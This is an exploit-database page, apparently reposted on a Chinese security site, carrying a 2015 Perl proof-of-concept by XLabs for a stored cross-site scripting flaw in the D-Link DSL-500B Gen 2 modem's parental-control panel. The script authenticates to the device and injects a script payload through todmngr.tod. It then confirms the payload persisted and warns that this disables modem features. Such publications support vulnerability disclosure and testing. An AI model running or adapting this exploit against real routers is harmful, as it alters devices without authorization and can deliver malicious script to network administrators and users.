D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Stored XSS

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Stored XSS

来源：www.xlabs.com.br 作者：XLabs 发布时间：2015-05-12

#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

    my $ip = $ARGV[0];

    my $user = $ARGV[1];

    my $pass = $ARGV[2];


        if (@ARGV != 3){

            print "\n";
            print "XLabs Information Security www.xlabs.com.br\n";
            print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
            print "Developed by Mauricio Correa\n";
            print "Contact: mauricio\@xlabs.com.br\n";
            print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

        }else{

            $ip = $1 if($ip=~/(.*)\/$/);

            print "XLabs Information Security www.xlabs.com.br\n";
            print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
            print "Developed by Mauricio Correa\n";
            print "Contact: mauricio\@xlabs.com.br\n";
            print "[+] Exploring $ip\/ ...\n";

            my $payload = "%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E";

            my $ua = new LWP::UserAgent;

            my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

            $hdrs->authorization_basic($user, $pass);

            chomp($ip);


            print "[+] Preparing exploit...\n";

            my $url_and_xpl = "$ip/todmngr.tod?action=add&username=$payload&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840";

            my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

            print "[+] Prepared!\n";

            print "[+] Requesting and Exploiting...\n";

            my $resp = $ua->request($req);

            if ($resp->is_success){

            print "[+] Successfully Requested!\n";


                my $url = "$ip/todmngr.tod?action=view";

                $req = new HTTP::Request("GET",$url,$hdrs);

                print "[+] Checking that was explored...\n";


                my $resp2 = $ua->request($req);


                if ($resp2->is_success){

                my $resultado = $resp2->as_string;

                            if(index($resultado, uri_unescape($payload)) != -1){

                            print "[+] Successfully Exploited!";

                            }else{

                            print "[-] Not Exploited!";

                            }
                }

            }else {

            print "[-] Ops!\n";
            print $resp->message;

            }

}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告